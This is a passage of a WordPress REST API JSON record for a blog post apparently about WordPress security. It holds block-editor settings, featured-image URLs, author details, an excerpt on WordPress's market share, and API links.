auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/sk\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content 
management system in the world, powering more than 40 percent of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/sk\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}